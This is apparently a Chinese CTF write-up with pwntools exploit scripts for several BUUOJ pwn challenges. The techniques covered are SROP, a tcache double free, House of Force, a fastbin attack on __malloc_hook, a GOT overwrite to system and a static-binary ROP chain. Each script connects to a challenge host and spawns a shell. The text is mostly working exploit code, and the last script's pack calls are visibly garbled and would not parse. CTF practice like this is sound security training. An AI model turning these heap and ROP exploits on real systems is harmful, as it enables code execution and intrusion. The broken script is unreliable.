贴张表:
ip 是接下来要执行的地址, sp 是这里执行完之后继续执行时用到的栈地址(大概XD)
怎么找 /bin/sh 字符串的地址, 看我之前这篇:
https://blog.csdn.net/carol2358/article/details/105643009
rsi
当然直接调试找也是可以的
exp:
from pwn import *
from LibcSearcher import *
local_file = './ciscn_2019_es_7'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
# 0 -> run the binary locally under pwntools, anything else -> the remote instance.
select = 1
if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26293)
    #libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

# Short names for the tube operations used by the exploit body below.
def se(data):
    """Send *data* raw."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)

def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a u32."""
    padded = data.ljust(4, '\0')
    return u32(padded)

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a u64."""
    padded = data.ljust(8, '\0')
    return u64(padded)

def info_addr(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    suffix = ': {:#x}'.format(addr)
    return r.info(tag + suffix)
def debug(cmd=''):
    """Attach gdb to the running target *r*, feeding it *cmd* as the gdb script."""
    script = cmd
    gdb.attach(r, script)
# Fixed code addresses in the target, as listed in the writeup.
gadget_sigreturn = 0x4004DA
gadget_system = 0x4004E2   # not used by this script
read = 0x4004F1
syscall_ret = 0x400517
# NOTE(review): Python 2 string semantics throughout (str payloads, str(sigframe));
# under Python 3 these concatenations would need bytes.
# Stage 1: 16 bytes ('/bin/sh' + padding) followed by the read gadget's address —
# presumably landing on the saved return address (see the "ip"/"sp" note above).
p1 = '/bin/sh\x00' + '\x00'*8 + p64(read)
sl(p1)
# Leak: read until a 0x7f byte, keep the 6 bytes ending there and widen to 8.
stack_addr = uu64(ru('\x7f')[-6:])
info_addr('stack_addr', stack_addr)
# Sigreturn frame: once the sigreturn gadget runs, the registers below are
# restored and execution resumes at rip = syscall_ret with rax = SYS_execve.
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = stack_addr - 0x118   # assumed to point at the '/bin/sh' sent above — confirm in gdb
sigframe.rsi = 0
sigframe.rdx = 0
#sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
# Stage 2: same 16-byte prefix, return into the sigreturn gadget, then the
# syscall gadget, followed by the serialised frame.
p2 = '/bin/sh\x00' + '\x00'*8 + p64(gadget_sigreturn) + p64(syscall_ret) + str(sigframe)
sl(p2)
r.interactive()
tcache 能存放的最大 chunk 为 0x408
做这题的时候脑溢血,填完tcache才发现不用填,然后后面就一系列脑溢血操作,把bin破坏了,还忘了这题是买一送一型,直接没法add orz,多谢小可爱师傅教我
没什么要说的, 注意最后改的是 tcache 里那个 chunk 的 fd, 别再脑溢血去改 unsorted bin 里的了
exp:
from pwn import *
from LibcSearcher import *
local_file = './ciscn_2019_es_1'
local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
# 0 -> run the binary locally under pwntools, anything else -> the remote instance.
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 28463)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

# Short names for the tube operations used by the exploit body below.
def se(data):
    """Send *data* raw."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)

def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a u32."""
    padded = data.ljust(4, '\0')
    return u32(padded)

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a u64."""
    padded = data.ljust(8, '\0')
    return u64(padded)

def info_addr(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    suffix = ': {:#x}'.format(addr)
    return r.info(tag + suffix)
def debug(cmd=''):
    """Attach gdb to the running target *r*, feeding it *cmd* as the gdb script."""
    script = cmd
    gdb.attach(r, script)
def add(size, content, call):
    """Menu option 1: create an entry of *size* bytes named *content*, with *call* as its second field."""
    steps = (
        (sla, 'choice:', '1'),
        (sla, 'Please input the size of compary\'s name\n', str(size)),
        (sea, 'please input name:\n', content),
        (sea, 'please input compary call:\n', str(call)),
    )
    for send, prompt, value in steps:
        send(prompt, value)
def show(index):
    """Menu option 2: print the entry stored at *index*."""
    for prompt, value in (('choice:', '2'), ('index:\n', str(index))):
        sla(prompt, value)
def free(index):
    """Menu option 3: release the entry stored at *index*."""
    for prompt, value in (('choice:', '3'), ('index:\n', str(index))):
        sla(prompt, value)
# NOTE(review): Python 2 string semantics (str payloads) — bytes needed under Python 3.
# Heap setup; the trailing numbers are the index each add() is expected to get.
add(0x410, 'aaaa', 1)#0  (larger than the tcache limit noted above)
add(0x28, 'bbbb', 1)#1
add(0x410, 'cccc', 1)#2  (presumably keeps chunk 0 away from the top chunk — verify)
add(0x18, '/bin/sh\x00', 1)#3
# Free chunk 0 and print it: the freed chunk's fd now holds a libc (main_arena) pointer.
free(0)
show(0)
main_arena = uu64(ru('\x7f')[-6:])
info_addr('main_arena', main_arena)
# The writeup's arithmetic from the leaked pointer back to libc's load address.
libc_base = main_arena - 96 -0x10 - libc.sym['__malloc_hook']
info_addr('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
og = libc_base + 0x4f322   # offset taken from the writeup; presumably a one-gadget for this libc build
# Double free of chunk 1 so the same chunk is queued twice in tcache.
free(1)
free(1)
# The first reallocation writes free_hook into the freed chunk's fd (the tcache
# fd the note above refers to); the third add is intended to be served at
# __free_hook and receives og.
add(0x28, p64(free_hook), 1)#4
add(0x28, 'aaaa', 1)#5
add(0x28, p64(og), 1)#5  (the writeup repeats "5" here; presumably index 6 — verify)
# Freeing an entry now goes through the overwritten __free_hook.
free(5)
#debug()
#sl('1')
r.interactive()
House of Force
条件:
能够以溢出等方式控制到 top chunk 的 size 域
能够自由地控制堆分配尺寸的大小
exp:
from pwn import *
from LibcSearcher import *
local_file = './bamboobox'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
# 0 -> run the binary locally under pwntools, anything else -> the remote instance.
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25604)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

# Short names for the tube operations used by the exploit body below.
def se(data):
    """Send *data* raw."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)

def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a u32."""
    padded = data.ljust(4, '\0')
    return u32(padded)

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a u64."""
    padded = data.ljust(8, '\0')
    return u64(padded)

def info_addr(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    suffix = ': {:#x}'.format(addr)
    return r.info(tag + suffix)
def debug(cmd=''):
    """Attach gdb to the running target *r*, feeding it *cmd* as the gdb script."""
    script = cmd
    gdb.attach(r, script)
def menu(choice):
    """Answer the main-menu prompt with *choice*."""
    answer = str(choice)
    sla('Your choice:', answer)
def show():
    """Menu option 1: list the stored items."""
    return menu(1)
def add(size, content):
    """Menu option 2: add an item named *content* with declared name length *size*."""
    menu(2)
    answers = (
        ('Please enter the length of item name:', str(size)),
        ('Please enter the name of item:', content),
    )
    for prompt, value in answers:
        sea(prompt, value)
def edit(index, size, content):
    """Menu option 3: rename item *index* to *content*, declaring length *size*."""
    menu(3)
    answers = (
        ('Please enter the index of item:', str(index)),
        ('Please enter the length of item name:', str(size)),
        ('Please enter the new name of the item:', content),
    )
    for prompt, value in answers:
        sea(prompt, value)
def free(index):
    """Menu option 4: remove item *index*."""
    menu(4)
    answer = str(index)
    sea('Please enter the index of item:', answer)
# Address the writeup calls the backdoor ("后门" below).
magic = 0x400D49
# NOTE(review): Python 2 string semantics (str + p64() concatenation).
add(0x40, 'aaaa')#0
# Write 0x50 bytes into the 0x40-byte item 0 so the overflow sets the top
# chunk's size field to -1 — House of Force precondition 1 above.
edit(0, 0x50, 'a'*0x40+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
# A "negative" request size moves the top chunk pointer backwards; both
# offsets are the writeup's, not derived here — confirm in gdb for a rebuilt binary.
offset_heap_base = -(0x50+0x20)
malloc_size = offset_heap_base - 0x8 - 0xf
add(malloc_size, 'aaaa')
# The next allocation is served from the relocated top chunk; magic is written
# twice into it (presumably over a pair of function pointers — confirm).
add(0x10, p64(magic)*2)
#debug()
#sl('1')
r.interactive()
当然也可以不用后门
exp:
from pwn import *
from LibcSearcher import *
local_file = './bamboobox'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
# 0 -> run the binary locally under pwntools, anything else -> the remote instance.
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25604)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

# Short names for the tube operations used by the exploit body below.
def se(data):
    """Send *data* raw."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)

def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a u32."""
    padded = data.ljust(4, '\0')
    return u32(padded)

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a u64."""
    padded = data.ljust(8, '\0')
    return u64(padded)

def info_addr(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    suffix = ': {:#x}'.format(addr)
    return r.info(tag + suffix)
def debug(cmd=''):
    """Attach gdb to the running target *r*, feeding it *cmd* as the gdb script."""
    script = cmd
    gdb.attach(r, script)
def menu(choice):
    """Answer the main-menu prompt with *choice*."""
    answer = str(choice)
    sla('Your choice:', answer)
def show():
    """Menu option 1: list the stored items."""
    return menu(1)
def add(size, content):
    """Menu option 2: add an item named *content* with declared name length *size*."""
    menu(2)
    answers = (
        ('Please enter the length of item name:', str(size)),
        ('Please enter the name of item:', content),
    )
    for prompt, value in answers:
        sea(prompt, value)
def edit(index, size, content):
    """Menu option 3: rename item *index* to *content*, declaring length *size*."""
    menu(3)
    answers = (
        ('Please enter the index of item:', str(index)),
        ('Please enter the length of item name:', str(size)),
        ('Please enter the new name of the item:', content),
    )
    for prompt, value in answers:
        sea(prompt, value)
def free(index):
    """Menu option 4: remove item *index*."""
    menu(4)
    answer = str(index)
    sea('Please enter the index of item:', answer)
# NOTE(review): Python 2 string semantics (str + p64() concatenation).
# Heap setup; the trailing numbers are the index each add() is expected to get.
add(0x18, 'aaaa')#0
add(0x10, 'bbbb')#1
add(0x68, 'cccc')#2
add(0x10, 'dddd')#3
# Overflow from item 0 into item 1's header: its size field becomes 0x91, so
# freeing item 1 releases a region that also covers item 2.
edit(0, 0x20, 'a'*0x10+p64(0)+p64(0x91))
free(1)
# Re-carve a small item from the freed region; the remainder stays in the
# unsorted bin and its fd (pointing into libc) is what show() prints.
add(0x10, 'eeee')#1
show()
# 88 is the writeup's offset from the leaked pointer back to main_arena.
main_arena = uu64(ru('\x7f')[-6:]) - 88
info_addr('main_arena', main_arena)
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
info_addr('libc_base', libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc_hook = libc_base + libc.sym['__libc_realloc']   # despite the name, this is the __libc_realloc symbol itself
og = libc_base + 0x4526a   # offset taken from the writeup; presumably a one-gadget for this libc build
free(2)
# Item 1 overlaps item 2's header: rewrite its size (0x71) and fd so the next
# 0x68 allocation but one is served from malloc_hook-0x23.
edit(1, 0x28, 'a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add(0x68, 'aaaa')#2
add(0x68, 'aaaa')#4  (served from the forged entry near __malloc_hook)
# 0xb bytes of padding, then og and __libc_realloc+0xa; presumably these land on
# __realloc_hook and __malloc_hook respectively — confirm against the libc layout.
edit(4, 0x1b, 'a'*0xb+p64(og)+p64(realloc_hook+0xa))
#add(0x10, 'aaaa')
#debug()
#sl('1')
r.interactive()
本题将free的got修改为system
第一次 edit 之后 free, 第二个 chunk 的 node 和本体已经互换; 之后要注意 content 指针: content 指针指向的地址才是 content 的内容, 所以可以借此把 free 的 GOT 改为 system
exp:
from pwn import *
from LibcSearcher import *
local_file = './heapcreator'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
# 0 -> run the binary locally under pwntools, anything else -> the remote instance.
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25955)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

# Short names for the tube operations used by the exploit body below.
def se(data):
    """Send *data* raw."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)

def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a u32."""
    padded = data.ljust(4, '\0')
    return u32(padded)

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a u64."""
    padded = data.ljust(8, '\0')
    return u64(padded)

def info(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    suffix = ': {:#x}'.format(addr)
    return r.info(tag + suffix)
def debug(cmd=''):
    """Attach gdb to the running target *r*, feeding it *cmd* as the gdb script."""
    script = cmd
    gdb.attach(r, script)
def menu(choice):
    """Answer the main-menu prompt with *choice* (no trailing newline)."""
    answer = str(choice)
    sea('Your choice :', answer)
def add(size, content):
    """Menu option 1: create a heap entry of *size* bytes holding *content*."""
    menu(1)
    answers = (
        ('Size of Heap : ', str(size)),
        ('Content of heap:', content),
    )
    for prompt, value in answers:
        sea(prompt, value)
def edit(index, content):
    """Menu option 2: overwrite entry *index* with *content*."""
    menu(2)
    answers = (
        ('Index :', str(index)),
        ('Content of heap : ', content),
    )
    for prompt, value in answers:
        sea(prompt, value)
def show(index):
    """Menu option 3: print entry *index*."""
    menu(3)
    answer = str(index)
    sea('Index :', answer)
def free(index):
    """Menu option 4: delete entry *index*."""
    menu(4)
    answer = str(index)
    sea('Index :', answer)
# NOTE(review): Python 2 string semantics (str + p64()/p8() concatenation).
add(0x18, 'a')   # index 0
add(0x10, 'a')   # index 1
# Write one byte past entry 0: the low byte of entry 1's size field becomes 0x41
# (the "node and content swap" the note above describes follows from this).
edit(0, '/bin/sh\x00'+p64(0)*2+p8(0x41))
free(1)
# Reclaim the enlarged region; its tail overlaps entry 1's node, where the size
# (0x30) and the content pointer are planted — the latter now points at free's GOT slot.
add(0x30, 'a'*0x20+p64(0x30)+p64(elf.got['free']))
show(1)   # prints what the content pointer references, i.e. free's libc address
# Rebase from the leaked free address to system using the libc symbol offsets.
sys_addr = uu64(ru('\x7f')[-6:]) - libc.sym['free'] + libc.sym['system']
edit(1, p64(sys_addr))   # writes through the content pointer into free's GOT entry
free(0)   # per the writeup, free(entry 0) now runs system on the '/bin/sh' string
r.interactive()
静态编译,随便写写
直接 ROPgadget --binary picoctf_2018_can_you_gets_me --ropchain
exp 头部要加上 from struct import pack
exp:
from pwn import *
from LibcSearcher import *
from struct import pack
local_file = './PicoCTF_2018_can-you-gets-me'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
# 0 -> run the binary locally under pwntools, anything else -> the remote instance.
select = 1
if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25369)
    #libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch

# Short names for the tube operations used by the exploit body below.
def se(data):
    """Send *data* raw."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return r.recvuntil(delims)

def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a u32."""
    padded = data.ljust(4, '\0')
    return u32(padded)

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a u64."""
    padded = data.ljust(8, '\0')
    return u64(padded)

def info(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    suffix = ': {:#x}'.format(addr)
    return r.info(tag + suffix)
def debug(cmd=''):
    """Attach gdb to the running target *r*, feeding it *cmd* as the gdb script."""
    script = cmd
    gdb.attach(r, script)
def pwn():
    """Return the ROPgadget-generated chain (see the --ropchain command above).

    NOTE(review): every pack( call below has lost its first argument, the struct
    format string, in the page extraction — as pasted, each line opens an
    unterminated string literal and this function does not parse. Restore the
    format argument ROPgadget emitted before running. Written for Python 2:
    str and pack() output are concatenated directly.
    """
    # 0x1c bytes of filler before the chain (offset taken from the writeup).
    p = 'a'*0x18+'bbbb'
    # Store '/bin' and '//sh' into .data, then a zero dword after them.
    p += pack(', 0x0806f02a) # pop edx ; ret
    p += pack(', 0x080ea060) # @ .data
    p += pack(', 0x080b81c6) # pop eax ; ret
    p += '/bin'
    p += pack(', 0x080549db) # mov dword ptr [edx], eax ; ret
    p += pack(', 0x0806f02a) # pop edx ; ret
    p += pack(', 0x080ea064) # @ .data + 4
    p += pack(', 0x080b81c6) # pop eax ; ret
    p += '//sh'
    p += pack(', 0x080549db) # mov dword ptr [edx], eax ; ret
    p += pack(', 0x0806f02a) # pop edx ; ret
    p += pack(', 0x080ea068) # @ .data + 8
    p += pack(', 0x08049303) # xor eax, eax ; ret
    p += pack(', 0x080549db) # mov dword ptr [edx], eax ; ret
    # Arguments: ebx -> the string, ecx and edx -> the zero dword.
    p += pack(', 0x080481c9) # pop ebx ; ret
    p += pack(', 0x080ea060) # @ .data
    p += pack(', 0x080de955) # pop ecx ; ret
    p += pack(', 0x080ea068) # @ .data + 8
    p += pack(', 0x0806f02a) # pop edx ; ret
    p += pack(', 0x080ea068) # @ .data + 8
    # eax = 0, then eleven inc eax gadgets, then the syscall.
    p += pack(', 0x08049303) # xor eax, eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0807a86f) # inc eax ; ret
    p += pack(', 0x0806cc25) # int 0x80
    return p
# Build the chain, send it raw (no trailing newline), then hand the tube to the user.
p = pwn()
se(p)
r.interactive()